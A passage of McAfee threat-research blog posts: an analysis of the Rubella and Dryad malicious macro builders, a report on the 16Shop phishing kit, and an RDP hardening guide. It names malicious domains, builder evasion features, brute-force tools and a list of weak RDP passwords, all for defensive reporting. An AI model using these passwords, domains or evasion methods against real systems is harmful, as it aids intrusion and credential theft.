It is not enough to have decentralized locations. A single business can have decentralized assets such as branches or organizational structures. There needs to be a clear separation of control between the entities. Databases have long proven capable of working across geographies. However, blockchain can provide a mechanism of agreement when central databases are difficult, if not impossible, to implement.

Any system with assumed trust is also not a good candidate for blockchain. Even if a central database is not an option, an interface to retrieve data and synchronize databases can still be magnitudes of times faster than blockchain. You simply need to trust the data has not been tampered with now or in the future. If the other parties have incentives, such as economic advantages, then trust is diminished and blockchain may help surmount the trust hurdle.

Determining which blockchain to use is not easy. If you simply want to release digital incentives such as rewards points, then tokens built on top of cryptocurrencies could work. If you require complicated rules, then smart contract–supported networks such as EOS and Ethereum may be what you need. Flexibility, privacy and enterprise-ready support can be found on various Hyperledger frameworks. Even privately built blockchains are a reasonable option in some scenarios. Your choice of Nakamoto-style consensus or Byzantine fault tolerance, coupled with concerns for privacy, speed, and scale will help guide your decision. It is important to remain informed of what blockchain can and cannot do. Databases should be your first choice until you can show both decentralization and lack of trust issues. Choosing blockchain for its strengths can transform your business in a positive way. Implementing blockchain where it does not fit could have devastating effects on a business’ ability to scale quickly and operate effectively.

 

———————————————————————————-

 

[i] https://www.ispot.tv/ad/doiE/ibm-blockchain-smart-supply-chain

[ii] https://www.coindesk.com/american-express-upgrades-rewards-program-hyperledger-blockchain/

[iii] https://www.americanbanker.com/news/has-amex-found-a-data-gold-mine-with-its-rewards-blockchain

[iv] https://lo3energy.com/

[v] https://www.siemens.com/press/en/pressrelease/?press=/en/pressrelease/2017/energymanagement/pr2017120121emen.htm

[vi] https://docs.wixstatic.com/ugd/bd1fb8_4e16d895b37e4b2a9d4dafdbb82cef2a.pdf

[vii] http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=1&p=1&f=G&l=50&d=PTXT&S1=9,928,746.PN.&OS=pn/9,928,746&RS=PN/9,928,746

[viii] https://novablitz.com

[ix] https://bitcoin.org/bitcoin.pdf

[x] https://medicalchain.com/en/

[xi] https://www.debeersgroup.com/media/company-news/2018/de-beers-group-successfully-tracks-first-diamonds-from-mine-to-r

[xii] https://en.bitcoin.it/wiki/Weaknesses

[xiii] https://www.mcafee.com/enterprise/en-us/assets/reports/rp-blockchain-security-risks.pdf

[xiv] https://www.hyperledger.org/

[xv] https://www.ibm.com/developerworks/cloud/library/cl-blockchain-private-confidential-transactions-hyperledger-fabric-zero-knowledge-proof/index.html

[xvi] https://www.ibm.com/blockchain/hyperledger

[xvii] https://medium.com/coinmonks/comparison-of-permissioned-blockchains-6537a0694df0

[xviii] https://docs.google.com/spreadsheets/d/12PPUxqDaTSR2K2gNQJ7EqIN1ezCiwwa51GZTcN3O6T8/edit#gid=0

[xix] https://www.forbes.com/sites/michaeldelcastillo/2018/07/03/big-blockchain-the-50-largest-public-companies-exploring-blockchain/#4cbf04e42b5b

[xx] https://bitcoin.org/bitcoin.pdf

[xxi] https://digiconomist.net/bitcoin-energy-consumption

[xxii] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxiii] https://sawtooth.hyperledger.org/docs/core/releases/1.0/introduction.html

[xxiv] https://software.intel.com/en-us/articles/code-sample-intel-software-guard-extensions-remote-attestation-end-to-end-example

[xxv] https://blockonomi.com/practical-byzantine-fault-tolerance/

[xxvi] http://pmg.csail.mit.edu/papers/osdi99.pdf

[xxvii] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxviii] https://blog.ethereum.org/2015/01/28/p-epsilon-attack/

[xxix] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxx] https://en.wikipedia.org/wiki/Proof-of-stake

[xxxi] https://medium.com/@lkolisko/in-depth-on-differences-between-public-private-and-permissioned-blockchains-aff762f0ca24

The post Demystifying Blockchain: Sifting Through Benefits, Examples and Choices appeared first on McAfee Blogs.

McAfee ATR Aids Police in Arrest of the Rubella and Dryad Office Macro Builder Suspect

Everyday thousands of people receive emails with malicious attachments in their email inbox. Disguised as a missed payment or an invoice, a cybercriminal sender tries to entice a victim to open the document and enable the embedded macro. This macro then proceeds to pull in a whole array of nastiness and infect a victim’s machine. Given the high success rate, malicious Office documents remain a preferred weapon in a cyber criminal’s arsenal. To take advantage of this demand and generate revenue, some criminals decided to create off-the-shelf toolkits for building malicious Office documents. These toolkits are mostly offered for sale on underground cybercriminal forums.

Announced today, the Dutch National High-Tech Crime Unit (NHTCU) arrested an individual suspected of building and selling such a criminal toolkit named the Rubella Macro Builder. McAfee Advanced Threat Research spotted the Rubella toolkit in the wild some time ago and was able to provide NHTCU with insights that proved crucial in its investigation. In the following blog we will explain some of the details we found that helped unmask the suspected actor behind the Rubella Macro Builder.

What is an Office Macro Builder?

An Office Macro Builder is a toolkit designed to weaponize an Office document so it can deliver a malicious payload by the use an obfuscated macro code that purposely tries to bypass endpoint security defenses. By using a toolkit dedicated to this purpose, an actor can push out higher quantities of malicious documents and successfully outsource the first stage evasion and delivery process to a specialized third party. Below is an overview with the general workings of an Office Macro Builder. The Defense evasion shown here is specific to Rubella Office Macro Builder. Additional techniques can be found in other builders.

Dutch Language OpSec fail….

Rubella Macro Builder is such a toolkit and was offered by an actor by the same nickname “Rubella”. The toolkit was marketed with colorful banners on different underground forums. For the price of 500 US Dollars per month you could use his toolkit to weaponize Office documents that bypass end-point security systems and deliver a malicious payload or run a PowerShell Code of your choice.

Rubella advertisement banner

In one of Rubella’s forum postings the actor was detailing the toolkit and that it managed to bypass the Windows Anti Malware Scan Interface (AMSI) present in Windows 10. To prove this success, the post contained a link to a screenshot. Being a Dutch researcher, this screenshot immediately stood out because of the Dutch version of Microsoft Word that was used. Dutch is a very uncommon language, only a small percentage of the world’s population speaks it, let alone an even smaller percentage of cybercriminals who use it.

The linked screenshot with the Dutch version of Microsoft Word.

Interestingly enough we reported last year on the individuals behind Coinvault ransomware. One of the reasons they got caught was the use of flawless Dutch in their code. With this in the back of our minds we decided to go deeper down the rabbit hole.

Forum Research

We looked further into the large amount of posts by Rubella to learn more about the person behind the builder. The actor Rubella was actually promoting a variety of different, some self-written, products and services, ranging from (stolen) credit card data, a crypto wallet stealer and a malicious loader software to a newly pitched product called Tantalus ransomware-as-a-service.

During our research we were able to link different nicknames used by the actor on several forums across a timespan of many years. Piecing it all together, Rubella showed a classic growth pattern of an aspiring cybercriminal, started by gaining technical security knowledge on beginner forums with low op-sec and gradually moved to some of the bigger, exclusive forums to offer products and services.

PDB path Breitling

One of the posts Rubella placed on a popular hacker forum was promoting a piece of free software the actor coded to spoof email. The posting contained a link to VirusTotal and included a SHA-256 hash of the software. This gained our interest since it provided a possibility to link the adversary to the capability.

Email spoofer posting including the VirusTotal link 

Closer examination of the piece of software on VirusTotal showed that the mail Spoofer contained a debug or PDB path “C:\Users\Breitling”. Even though the username Breitling isn’t very revealing about an actual person, leaving such a specific PDB path within malware is a classic mistake.

By pivoting on the specific PDB path we found additional samples on VirusTotal, including a file that was named RubellaBuilder.exe, which was a version of the Macro builder that Rubella was offering. Later in the blog post we will take a closer look at the builder itself.

Finding additional samples with the Breitling PDB path

Since Breitling was most likely the username used on the development machine, we were wondering if we could find Office documents that were crafted on the same machine and thus also containing the author name Breitling. We found an Office document with Breitling as author and the document happened to be created with a Dutch version of Microsoft Word.

The Word document containing the author name Breitling.

Closer inspection of the content of the Word document revealed that it also contained a string with the familiar Jabber account of Rubella; Rubella(@)exploit.im.

The Malicious document containing the string with the actor’s jabber account.

Circling back to the forums we found an older posting under one of the nicknames we could link to Rubella. In this posting the actor is asking for advice on how to add a registry key using C#. They placed another screenshot to show the community what they were doing. This behavior clearly shows a lack of skill but at the same time his thirst for knowledge.

Older posting where the actor asks for help.

A closer look at the screenshot revealed the same PDB path C:\Users\Breitling\.

Screenshot with the Breitling PDB path

Chatting with Rubella

Since Rubella was quite extroverted on the underground forums and had stated Jabber contact details in advertisements we decided to carefully initiate contact with him in the hope that we would get access to some more information. About a week after we added Rubella to our Jabber contact list, we received a careful “Hi.” We started talking and posing as a potential buyer, carefully mentioning our interest the Rubella Macro Builder. During this chat Rubella was quite responsive and as a real businessperson, mentioned that he was offering a new “more exclusive” Macro Builder named Dryad. Rubella proceeded to share a screenshot of Dryad with us.

Screenshot of Dryad shared by Rubella

 Eventually we ended our conversation in a friendly manner and told Rubella we would be in touch if we remained interested.

Dryad Macro Builder

Based on the information provided from the chat with Rubella we performed a quick search for Dryad Macro Builder. We eventually found a sample of the Dryad Macro Builder and decided to further analyze this sample and compare it for overlap with the Rubella Macro Builder.

PE Summary

We noticed that the program was coded in .NET Assembly which is usually a preferred language for less skilled malware coders.

Dynamic Analysis

When we ran the application, it asked us to enter a login and password in order to run.

We also noticed a number-generated HWID (Hardware-ID) that was always the same when running the app. The HWID number is a unique identifier specific to the machine it was running on and was used to register the app.

When trying to enter a random name we detected a remote connection to the website ‘hxxps://tailoredtaboo.com/auth/check.php’ to verify the license.

The request is made with the following parameters ‘hwid=<HWID>&username=<username>&password=<password>’.

Once the app is running and registered it shows the following interface.

In this interface it is possible to see the function proposed by the app and it was similar to the screenshot that was shared during our chat.

Basically, the tool allows the following:

  • Download and execute a malicious executable from an URL
  • Execute a custom command
  • Type of payload can be exe, jar, vbs, pif, scr
  • Modify the dropped filename
  • Load a stub for increase obfuscation
  • Generate a Word or Excel document

It contains an Anti-virus Evasion tab:

  • Use encryption and modify the encryption key
  • Add junk code
  • Add loop code

It also contains a tab which is still in development:

  • Create Jscript or VBscript
  • Download and execute
  • Payload URL
  • Obfuscation with base64 and AMSI bypass which are not yet developed.

Reverse Engineering

The sample is coded in .Net without any obfuscation. We can see in the following screenshot the structure of the file.

Additionally, it uses the Bunifu framework for the graphic interface. (https://bunifuframework.com/)

Main function

The main function launches the interface with the pre-configuration options. We can see here the link to putty.exe (also visible in the screenshots) for the payload that needs to be changed by the user.

Instead of running an executable, it is also possible to run a command.

By default, the path for the stub is the following:

We can clearly see here a link with Rubella.

Licensing function

To use the program, it requires a license, that the user has to enter from the login form.

The following function shows the login form.

To validate the license the program will perform some check and combine a Hardware ID, a username and a password.

The following function generates the hardware id.

It gets information from ‘Win32_Processor class’ to generate the ID.

It collects information from:

  • UniqueId: Globally unique identifier for the processor. This identifier may only be unique within a processor family.
  • ProcessorId: Processor information that describes the processor features.
  • Name: This value comes from the Processor Version member of the Processor Information structure in the SMBIOS information.
  • Manufacturer: This value comes from the Processor Manufacturer member of the Processor Information structure.
  • MaxClockSpeed: Maximum speed of the processor, in MHz.

Then it will collect information from the ‘Win32_BIOS class’.

  • Manufacturer: This value comes from the Vendor member of the BIOS Information structure.
  • SMBIOSVersion: This value comes from the BIOS Version member of the BIOS Information structure
  • IdentificationCode: Manufacturer’s identifier for this software element.
  • SerialNumber: Assigned serial number of the software element.
  • ReleaseDate: Release date of the Windows BIOS in the Coordinated Universal Time (UTC) format of YYYYMMDDHHMMSS.MMMMMM(+-)OOO.
  • Version: Version of the BIOS. This string is created by the BIOS manufacturer.

Then it will collect information from the ‘Win32_DiskDrive class’.

  • Model: Manufacturer’s model number of the disk drive.
  • Manufacturer: Name of the disk drive manufacturer.
  • Signature: Disk identification. This property can be used to identify a shared resource.
  • TotalHead: Total number of heads on the disk drive.

Then it will collect information from the ‘Win32_BaseBoard class’.

  • Model: Name by which the physical element is known.
  • Manufacturer: Name of the organization responsible for producing the physical element.
  • Name,
  • SerialNumber

Then it will collect information from the ‘Win32_VideoController class’.

  • DriverVersion
  • Name

With all that hardware information collected it will generate a hash that will be the unique identifier.

This hash, the username and password will be sent to the server to verify if the license is valid. In the source code we noticed the tailoredtaboo.com domain again.

Generate Macro

To generate a macro the builder is using several parts. The format function shows how each file structure is generated.

The structure is the following:

To save the macro in the malicious doc it uses the function ‘SaveMacro’:

Evasion Techniques

Additionally, it generates random code to obfuscate the content and adds junk code.

The function GenRandom is used to generate random strings, chars as well as numbers. It is used to obfuscate the macro generated.

It also uses a Junk Code function to add junk code into the document:

For additional obfuscation it uses XOR encryption as well as Base64.

Write Macro

Finally, the function WriteMacro, writes the content previously configured:

 

Under construction

We did also notice that the builder uses additional functions that were still under development, as we can see with the “Script Generator” tab.

A message is printed when we click on it and that indicates it is still a function in development.

Additionally, we can see the “Decoy Option” tab which is just a template to create another tab. The tab does not show anything. It seems the author left this tab to create another one.

Rubella Similarities

Dryad is very similar to the Rubella Builder; many hints present in the code confirm the conversation we had with Rubella. Unlike Rubella, Dryad did have a scrubbed PDB path.

Both Rubella builder and Dryad Builder are using the Bunifu framework for the graphic design.

The license check is also the same function, using the domain tailoredtaboo.com, Below is the license check function from the Rubella builder:

Tailoredtaboo.com Analysis

We analyzed the server used to register the builder and discovered additional samples:

Most of these samples were Word documents generated with the builder.

A quick search into the domain Tailoredtaboo showed that it had several subdomains, including a control panel on a subdomain named cpanel.tailoredtaboo.com.

The cPanel subdomain had the following login screen in the Dutch language.

The domain tailoredtaboo.com has been linked to malicious content in the past. On Twitter the researcher @nullcookies reported in April 2018 that he found some malicious files hosted on the specific domain. In the directory listing of the main domain there were several files also mentioning the name Rubella.

TailoredTaboo.com mentioned on Twitter

 

Based on all the references, and the way the domain Tailoredtaboo.com was used, we believe that the domain plays a central administrative role for both Rubella and Dryad Macro Builder and can provide insight into the customers of both Macro Builders

Conclusion

Toolkits that build weaponized Office documents, like Dryad and Rubella, cater to the increasing cybercriminal demand of this type of infection vector. With the arrest of the suspect comes an end to the era of Dryad and Rubella Macro Builder. Based on his activity, the suspect looked like quite the cybercriminal entrepreneur, but given his young age this is also a worrisome thought. If only he would have used his skills for good. The lure of quick cash was apparently more enticing than building a solid long-term career. We at McAfee never like to see young talented individuals heading down a dark path.

Indicators of Compromise

URL / Website:

hxxps://tailoredtaboo.com/auth/check.php

Hash Builder:

  • Dryad: 7d1603f815715a062e18ae56ca53efbaecc499d4193ea44a8aef5145a4699984
  • Rubella: 2a20d3d9ac4dc74e184676710a4165c359a56051c7196ca120fcf8716b7c21b9

Hash related samples:

93db479835802dc22ba5e55a7915bd25f1f765737d1efab72bde11e132ff165a

ad2f9ef7142a43094161eae9b9a55bfbb6dff85d890d1823e77fc4254f29ef17

c2c2fdcc36569f6866e19fcda702c823e7bf73d5ca394652ac3a0ccc6ff9c905

3c55e54f726758f5cb0d8ef81be47c6612dba5a73e3a29f82b73a4c773e691a3

74c8389f20e50ae3a9b7d7e69f6ae7ed1a625ccc8bb6a52b3cc435cf94e6e2d3

388ee9bc0acaeec139bc17bceb19a94071aa6ae43af4ec526518b5e1f1f38f07

08694ad23cafe45495fa790bfdc411ab5c81cc2412370633a236c688b07d26aa

428a30b8787d2ba441dba1dbc3acbfd40cf7f2fc143131a87a93f27db96b7a75

93db479835802dc22ba5e55a7915bd25f1f765737d1efab72bde11e132ff165a

c777012abe224126dca004561619cb0791096611257099058ece1b8d001277d0

5b773acad7da2f33d86286df6b5e95ae355ac50d143171a5b7ee61d6b3cad6d5

a17e3c2271a94450a7a7c6fcd936f177fc40ea156de4deafdfc14fd5aadfe503

1de0ebc0c375332ec60104060eecad77e0732fa2ec934f483f330110a23b46e1

b7a86965f22ed73de180a9f98243dc5dcfb6ee30533d44365bac36124b9a1541

The post McAfee ATR Aids Police in Arrest of the Rubella and Dryad Office Macro Builder Suspect appeared first on McAfee Blogs.

16Shop Now Targets Amazon

Since early November 2018 McAfee Labs have observed a phishing kit, dubbed 16Shop, being used by malicious actors to target Apple account holders in the United States and Japan. Typically, the victims receive an email with a pdf file attached.

An example of the message within the email is shown below, with an accompanying translation:

When the victims click on the link in the attached pdf file, they are redirected to a phishing site where they will then be tricked in to updating their account information, which often includes credit card details.

The following is one of the many pdf files that we have seen attached to the phishing emails:

The phishing page is shown below:

 

The following image shows the information that is being phished:

The following map shows the locations where we have observed this phishing campaign:

The author of this phishing campaign used the conversion site Pdfcrowd.com to create the malicious pdf file, which was attached in the phishing emails. (The pdf tag can be seen below):

16Shop phishing kit

The phishing kit originates in Indonesia and the code handles multiple languages:

Most phishing kits will email the credit card and account details entered on the site directly to the malicious actor. The 16Shop kit does this, too, and also stores a local copy in other text files. This is a weakness in the kit because anyone visiting the site can download the clear-text files (if the attacker uses the default settings).

The kit includes a local blacklist, which blocks certain IP addresses from accessing the website. This blacklist contains lots of IPs of security companies, including McAfee. The blacklisting prevents malware researchers from accessing the phishing sites. A snippet is shown below:

While looking at the code we observed several comments that appear to be tags of the creator. (More on this later.)

The creator of 16Shop also developed a tool to generate and send the phishing emails. We managed to gain a copy and analyze it.

The preceding configuration shows how an attacker can set the subject field as well as the origin address of the email. While looking through the source files, we noticed the file list.txt. This file contains the list of email addresses that the phisher sends to. The example file uses the address riswandanoor@yahoo.com:

This email, along with the name in the comments from the phishing kit, could potentially tell us some more about the creators of the kit.

The author of 16Shop

The author of the kit goes by the alias DevilScreaM. We gathered lots of information on this actor and found that this individual was involved in the Indonesian hacking group “Indonesian Cyber Army.” Several websites were defaced by this group and tagged by DevilScreaM in 2012.

We found DevilScreaM created the site Newbie-Security.or.id, an Indonesian site of hacking tools frequented by members of the Indonesian Cyber Army. We also discovered two eBooks written by DevilScreaM; they contain advice on website hacking and penetration testing.

The timeline of DevilScreaM’s activity shows a notable change in late 2012 and the middle of 2013. DevilScreaM stopped defacing websites and created an anti-malware product, ScreaMAV, for the Indonesian market. This “white hat” activity did not last. In mid-2013 they began defacing sites again and posting exploits on 0day.today mostly around WordPress vulnerabilities.

DevilScreaM’s GitHub page contains various tools, including a PHP remote shell used on compromised websites as well as commits on the z1miner Monero (XMR) miner tool. in late 2017 DevilScreaM created the 16Shop phishing kit and set up a Facebook group to sell licenses and support. In November 2018. this private group had over 200 members. We checked the group in mid-June 2019 and it now has over 300 members and over 200 posts. Despite the questionable content, the group not only persists unchanged on social media, but continues to grow.

McAfee has notified Facebook of the existence of this group. The social network has taken an active posture in recent months of taking down groups transacting in such malicious content.

Recent News and Switch to Amazon

In May 2019, several blogs were published highlighting that a version of 16shop was cracked which included a backdoor that would send all data via telegram to the author of the kit. We can confirm that this was not present in the version we analysed in November. These leads us to believe that this backdoor was added by a second malicious actor and not the original author of 16Shop.

[Telegram Bot API command from Cracked 16shop kit to send stolen data]

In May 2019, we found a new phishing kit which was targeting Amazon account holders. Looking at the code of the kit, you can see it shows several similarities to the 16shop kit targeting Apple users back in November 2018.

 

[Fake Login page]

[PHP code of Phishing Kit and Admin page]

Around the same time that we discovered the Amazon Phishing Kit, the social media profile picture of the actors we believe are behind 16shop changed to a modified Amazon logo. This reinforces our findings that the same group is responsible for the development of the new malicious kit.

[Obfuscated Profile Pic]

We believe that victims of this kit will be led to the malicious websites via links in phishing emails.

We recommend that if users want to check any account changes on Amazon, which they received via email or other sources, that they go to Amazon.com directly and navigate from there rather than following suspicious links.

Conclusion

During our monitoring, we observed over 200 Malicious URLs serving this phishing kit which highlights its widespread use (all URLs seen have been classified as malicious by McAfee).

The group responsible for 16shop kit continues to develop and evolve the kit to target a larger audience. To protect themselves, users need to be extremely vigilant when receiving unsolicited email and messages.

This demonstrates how malicious actors use legitimate companies to leverage their attacks and gain victims’ trust and it is expected that these kinds of groups will use other companies as bait in the future.

Indicators of compromise

Domains (all blocked by McAfee WebAdvisor)

Apple Kit

  • hxxps://secure2app-accdetall1.usa.cc.servsdlay.com/?16shop
  • hxxps://gexxodaveriviedt0.com/app1esubm1tbybz/?16shop
  • hxxps://gexxodaveriviedt0.com/secur3-appleld-verlfy1/?16shop
  • hxxps://sec2-accountdetail.accsdetdetail.com/?16shop

Amazon Kit

  • verification-amazonaccess.secure.dragnet404.com/
  • verification-amazon.servicesinit-id.com/
  • verification-amazonlocked.securesystem.waktuakumaleswaecdvhb.com/
  • verification-amazonaccess.jaremaubalenxzbhcvhsd.business/
  • verification-amazon.3utilities.com/
  • verification-amaz0n.com/

McAfee detections

  • PDF/16shop! V2 DAT =9086 , V3 DAT = 3537

Hashes (SHA-256)

  • 34f33612c9f6b132430385e6dc3f8603ff897d34c780bfa5a4cf7663922252ba
  • b43c2ba4e312d36a1b7458d1342600957e0daf3d1fcd8c7324afd387772f2cc0
  • 569612bd90de1a3a5d959abb12f0ec66f3696113b386e4f0e3a9face084b032a
  • d9070e68911db893dfe3b6acc8a8995658f2796da44f14469c73fbcb91cd1f73

For more information on phishing attacks:

The post 16Shop Now Targets Amazon appeared first on McAfee Blogs.

RDP Security Explained

RDP on the Radar

Recently, McAfee released a blog related to the wormable RDP vulnerability referred to as CVE-2019-0708 or “Bluekeep.” The blog highlights a particular vulnerability in RDP which was deemed critical by Microsoft due to the fact that it exploitable over a network connection without authentication. These attributes make it particularly ‘wormable’ – it can easily be coded to spread itself by reaching out to other accessible networked hosts, similar to the famous EternalBlue exploit of 2017. This seems particularly relevant when (at the time of writing) 3,865,098 instances of port 3389 are showing as open on Shodan.

Prior to this, RDP was already on our radar. Last July, McAfee ATR did a deep dive on Remote Desktop Protocol (RDP) marketplaces and described the sheer ease with which cybercriminals can obtain access to a large variety of computer systems, some of which are very sensitive. One of the methods of RDP misuse that we discussed was how it could aid deploying a targeted ransomware campaign. At that time one of the most prolific targeted ransomware groups was SamSam. To gain an initial foothold on its victims’ networks, SamSam would often rely on weakly protected RDP access. From its RDP launchpad, it would proceed to move laterally through a victim’s network, successfully exploiting and discovering additional weaknesses, for instance in a company’s Active Directory (AD).

In November 2018, the FBI and the Justice department indicted two Iranian men for developing and spreading the SamSam ransomware extorting hospitals, municipalities and public institutions, causing over $30 million in losses. Unfortunately, this did not stop other cybercriminals from using similar tactics, techniques and procedures (TTPs).

The sheer number of vulnerable systems in the wild make it a “target” rich environment for cybercriminals.

In the beginning of 2019 we dedicated several blogs to the Ryuk ransomware family that has been using RDP as an initial entry vector. Even though RDP misuse has been around for many years, it does seem to have gained an increased popularity amongst criminals focused on targeted ransomware.

Recent statistics showed that RDP is the most dominant attack vector, being used in 63.5% of disclosed targeted ransomware campaigns in Q1 of 2019.

Source: Coveware Q1 statistics

Securing RDP

Given the dire circumstances highlighted above it is wise to question if externally accessible RDP is an absolute necessity for any organization. It is also wise to consider how to better secure RDP if you are absolutely reliant on it. The good news is there are several easy steps that help an organization to better secure RDP access.

That is why, in this blog, we will use the adversarial knowledge from the McAfee ATR red team to explain what easy measures can be undertaken to harden RDP access.

Recommendations are additional to standard systems hygiene which should be carried out for all systems (although it becomes more important for Internet connected hosts), such as keeping all software up-to-date, and we intentionally avoid ‘security through obscurity’ items such as changing the RDP port number.

Do not allow RDP connections over the open Internet

To be very clear… RDP should never be open to the Internet. The internet is continuously being scanned for open port 3389 (the default RDP port). Even with a complex password policy and multi-factor authentication you can be vulnerable to denial of service and user account lockout. A much safer alternative is to use a Virtual Private Network (VPN). A VPN will allow a remote user to securely access their corporate network without exposing their computer to the entire Internet. The connection is mutually encrypted, providing authentication for both client and server, preferably using a dual factor, while creating a secure tunnel to the corporate network. As you only have access to the network you will still need to RDP to the computer but can do so more securely without exposing it to the internet.

Use Complex Passwords

An often-used alternative acronym for RDP is “Really Dumb Passwords.” That short phrase encapsulates the number one vulnerability of RDP systems, simply by scanning the internet for systems that accept RDP connections and launching a brute-force attack with popular tools such as, ForcerX, NLBrute, Hydra or RDP Forcer to gain access.

Using complex passwords will make brute-force RDP attacks harder to succeed.

Below are the top 15 passwords used on vulnerable RDP systems. We built this list based on information on weak passwords shared by a friendly Law Enforcement Agency from taken down RDP shops. What is most shocking is the fact that there is such a large number of vulnerable RDP systems did not even have a password.

The TOP 15 used passwords on vulnerable RDP systems

[no password]
123456
P@ssw0rd
123
Password1
1234
password
1
12345
Password123
admin
test
test123
Welcome1
scan

Use Multi-Factor Authentication

In addition to a complex password, it is best practice use multi-factor authentication. Even with great care and diligence, a username and password can still be compromised. If legitimate credentials have been compromised, multi-factor authentication adds an additional layer of protection by requiring the user to provide a security token, e.g. a code received by notification or a biometric verification. Better yet, a FIDO based authentication device can provide an extra factor which is not vulnerable to spoofing attacks, in a similar fashion to other one-time-password (OTP) mechanisms. This increases the difficulty for an unauthorized person to gain access to the computing device.

Use an RDP Gateway

Recent versions of Windows Server provide an RDP gateway server. This provides one external interface to many internal RDP endpoints, thus simplifying management, including many of the items outlined in the following recommendations. These comprise of logging, TLS certificates, authentication to the end device without actually exposing it to the Internet, authorization to internal host and user restrictions, etc.

Microsoft provides detailed instructions for configuration of remote desktop gateway server, for Windows Server 2008 R2 as an example, over here.

Lock out users and block or timeout IPs that have too many failed logon attempts

A high number of failed logon attempts is a strong indication of a brute force attack. Limiting the number of logon attempts per user can prevent such attacks. A failed logon attempt is logged under Windows Event ID 4625. An RDP logon falls under logon type 10, RemoteInteractive. The account lockout threshold can be specified in the local group policy under security settings: Account Policies.

For logging purposes, it is best to log both failed and successful logons. Additionally, it is important to note that “specific security layer for RDP connections” needs to be enabled. Otherwise, you will be unable to tell that the logon attempt came over RDP or see the source IP address. A comparison is shown below.

Event log network logon (type 3) note no source network address

Event log RDP logon (type 10) note the source network address present

Use a Firewall to restrict access

Firewall rules can be created to restrict Remote Desktop access so that only a specific IP address or a range of IP addresses can access a given device. This can be achieved by simply opening “Windows Firewall with Advanced Security,” clicking on Inbound Rules and scrolling down to the RDP rule. A screen shot can be seen below.

Firewall settings for inbound RDP connections 

Enable Restricted Admin Mode

When connecting to a remote machine via RDP, credentials are stored on that machine and may be retrievable by other users of the systems (e.g. malicious attackers). Microsoft has added restricted admin mode which instructs the RDP server not to store credentials of users who log in. Behind the scenes, the server now uses ‘network’ login rather than ‘interactive’ and therefore uses hashes or Kerberos tickets rather than passwords for authentication. Assessment of the pros and cons of this option are recommended before enabling in your environment. On the negative side, the use of network login exposes the possibility of credential reuse (pass the hash) attacks against the RDP server. Pass the hash is likely possible anyway, internally, via other exposed ports so may not significantly increase exposure there, but when including this option to Internet servers, where other ports are likely (and should be!) restricted, pass the hash is then extended to the Internet. Given the pros and cons, avoiding internal escalation of privilege is often prioritized and therefore restricted admin mode is enabled.

Microsoft TechNet describes configuration and usage of restricted mode here.

Encryption

There are four levels of encryption supported by standard RDP: Low, Client Compatible, High, and FIPS Compliant. This is configured on the Remote Desktop server. This can be further improved upon by using Enhanced RDP Security. When Enhanced RDP security is used, encryption and server authentication are implemented by external security protocols, e.g. TLS or CredSSP. One of the key benefits of Enhanced RDP Security is that it enables the use of Network Level Authentication (NLA) when using CredSSP as the external security protocol.

Certificate management is always a complexity, but Microsoft does provide this through the use of Active Directory Certificate Services (ADCS). Certificates can be pushed using Group Policy Objects (GPO) where this is available. Incompatible operating system environments must import certificates via the web interface exposed at https://<server>/Certsrv.

Enable Network Level Authentication (NLA)

To reduce the amount of initially required server resources, and thereby mitigate against denial of service attacks, network level authentication (NLA) can be used. Within this mode, strong authentication takes place before the remote desktop connection is established, using the Credential Security Support Provider (CredSSP) either through TLS or Kerberos. NLA can also help to protect against man-in-the-middle attacks, where credentials are intercepted. However, be aware that NLA over NTLM does not provide strong authentication and should be disabled in favor of NLA over TLS (with valid certificates).

Microsoft TechNet describes configuration and usage of NLA in Windows Server 2008 R2 here.

Interestingly, BlueKeep, mentioned above, is partially mitigated by having NLA enabled. As reported by Microsoft in the associated advisory “With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.”

Restrict users who can logon using RDP

All administrators can use RDP by default. Remote access should be limited to only the accounts that require it. If all administrators do not need remote access you should consider removing the Administrator account from the RDP access group. You can then add the specific users which require access to the “Remote Desktop Users” group. See here for more information on managing users in your RDS collection.

Minimize the Number of Local Administrator Accounts

Local administrator accounts provide an attack vector for attackers who gain access to a system. Credentials can be cracked offline and more accounts means more likelihood of a successful crack. Therefore, you should aim for a maximum of one local administrator account which is secured appropriately.

Ensure that Local Administrator Accounts are Unique

If the local administrator accounts match those assigned to their counterparts on other systems within the server’s internal network, the attacker can potentially re-use credentials to move laterally. This issue occurs quite frequently, so Microsoft provided Local Administrator Password Solution (LAPS) as a means to avoid this scenario across the organization with central management of unique local administrator credentials. This is particularly relevant for externally exposed systems.

Microsoft provides a download and usage information for LAPS here.

Limit Domain Administrator Account Access

Accounts within the domain admins group have full control of the domain by default, by virtue of being part of the administrators group for all domain controllers, domain workstations and domain member servers. If a credential for a domain admin account is retrieved from the RDP server, the attacker now holds the ‘keys to the kingdom’ and is in full control of the entire domain. You should reduce the amount of domain administrators within the organization in general and avoid accessing the RDP server or other externally exposed systems via these accounts, to avoid inadvertently making credentials accessible.

In general, ‘least privilege’ administration models should be used. Microsoft provides guidance in this area, including how best to use domain admin accounts, here.

Consider Placement Within the Network

Where possible, RDP servers should be placed within a DMZ or other restricted area of the network. The idea here is that if an attack is successful, its scope is reduced and confined to the RDP server alone. Often RDP is exposed specifically to allow external users onto the network, so this may not be a feasible solution, however it should be considered and the quantity of services reachable within the internal network should be minimized.

Consider using an account-naming convention that does not reveal organizational information

There are many options for account naming conventions, ranging from firstname.lastname to not deriving usernames from name data; all having their pros and cons. However, some of the more commonly used account naming conventions such as firstname.lastname, make it very easy to guess usernames and email addresses. This can be a security concern as spammers and hackers will readily use this information.

Conclusion

When trying to run an efficient IT organization, having remote access to certain computer systems might be essential. Unfortunately, when not implemented correctly, the tools that make remote access possible also open your systems up to unwanted guests. In the last few years there have been far too many examples of where vulnerable RDP access gave way to a full-scale network compromise.

In this article we have shown that RDP access can be hardened with some easy steps. Please take the time to review your RDP security posture.

The post RDP Security Explained appeared first on McAfee Blogs.

Why Process Reimaging Matters

As this blog goes live, Eoin Carroll will be stepping off the stage at Hack in Paris having detailed the latest McAfee Advanced Threat Research (ATR) findings on Process Reimaging.  Admittedly, this technique probably lacks a catchy name, but be under no illusion the technique is significant and is worth paying very close attention to.

